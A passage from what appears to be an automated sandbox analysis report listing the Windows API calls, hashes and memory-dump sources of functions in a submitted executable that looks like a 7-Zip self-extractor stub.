                                                                                                        • Opcode Fuzzy Hash: 22ff6adae0059519abcdcb5d952883f4cd1f1e51cc0638883f64576781f465c4
                                                                                                        • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                                        APIs
                                                                                                        • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                                        • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                        • String ID: IA
                                                                                                        • API String ID: 3462485524-3293647318
                                                                                                        • Opcode ID: 12236f9090ed8b96f5aeb47e9cfeefec7a8f36d4de3807175efa3ac18e6d1e15
                                                                                                        • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                                        • Opcode Fuzzy Hash: 12236f9090ed8b96f5aeb47e9cfeefec7a8f36d4de3807175efa3ac18e6d1e15
                                                                                                        • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wsprintf$ExitProcesslstrcat
                                                                                                        • String ID: 0x%p
                                                                                                        • API String ID: 2530384128-1745605757
                                                                                                        • Opcode ID: b249aacb09f47677336a249b8d18a2638e0221cc442200049396670476c8e20b
                                                                                                        • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                                        • Opcode Fuzzy Hash: b249aacb09f47677336a249b8d18a2638e0221cc442200049396670476c8e20b
                                                                                                        • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                                        APIs
                                                                                                          • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                                          • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$??3@
                                                                                                        • String ID: 100%%
                                                                                                        • API String ID: 2562992111-568723177
                                                                                                        • Opcode ID: 2743aec1773a9f53ad08651ca6e1debfd9a7ea2132d482739a2d831aa28a9c2f
                                                                                                        • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                                        • Opcode Fuzzy Hash: 2743aec1773a9f53ad08651ca6e1debfd9a7ea2132d482739a2d831aa28a9c2f
                                                                                                        • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                                                        APIs
                                                                                                        • wsprintfW.USER32 ref: 00407A12
                                                                                                          • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                          • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                        • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                                                          • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                          • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                                                        • String ID: (%u%s)
                                                                                                        • API String ID: 3595513934-2496177969
                                                                                                        • Opcode ID: fd64b36e949843e5f7cde4032f4744e34e1525db11abe46e5bd4feb7fcd38a8e
                                                                                                        • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                                                        • Opcode Fuzzy Hash: fd64b36e949843e5f7cde4032f4744e34e1525db11abe46e5bd4feb7fcd38a8e
                                                                                                        • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: GetNativeSystemInfo$kernel32
                                                                                                        • API String ID: 2574300362-3846845290
                                                                                                        • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                        • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                                                        • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                                        • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                        • API String ID: 2574300362-3900151262
                                                                                                        • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                        • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                                                        • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                                        • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                        • API String ID: 2574300362-736604160
                                                                                                        • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                        • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                                                        • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                                        • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                          • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1731127917-0
                                                                                                        • Opcode ID: e07bd45234e4f9196ba527e0f03cba738ebe7196a7f337a617a5ad915191ea77
                                                                                                        • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                                        • Opcode Fuzzy Hash: e07bd45234e4f9196ba527e0f03cba738ebe7196a7f337a617a5ad915191ea77
                                                                                                        • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                                                        APIs
                                                                                                        • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                                        • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                                        • wsprintfW.USER32 ref: 00403FFB
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PathTemp$AttributesFilewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1746483863-0
                                                                                                        • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                        • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                                        • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                                        • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                                        APIs
                                                                                                        • CharUpperW.USER32(?,7556E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                        • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                        • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                                        • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharUpper
                                                                                                        • String ID:
                                                                                                        • API String ID: 9403516-0
                                                                                                        • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                        • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                                        • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                                        • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                          • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                          • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                                        • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                          • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                          • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                          • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                          • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538916108-0
                                                                                                        • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                        • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                                        • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                                        • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                                        APIs
                                                                                                        • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                        • String ID:
                                                                                                        • API String ID: 1900162674-0
                                                                                                        • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                        • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                                                        • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                                        • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040749F
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                                                        • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                                                          • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                          • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1557639607-0
                                                                                                        • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                        • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                                                        • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                        • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                                                        APIs
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                                                          • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                          • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 612612615-0
                                                                                                        • Opcode ID: ddbb4d8407876be3fd4cef507a0c5286be4c7135757854b2874e871926ba49da
                                                                                                        • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                                                        • Opcode Fuzzy Hash: ddbb4d8407876be3fd4cef507a0c5286be4c7135757854b2874e871926ba49da
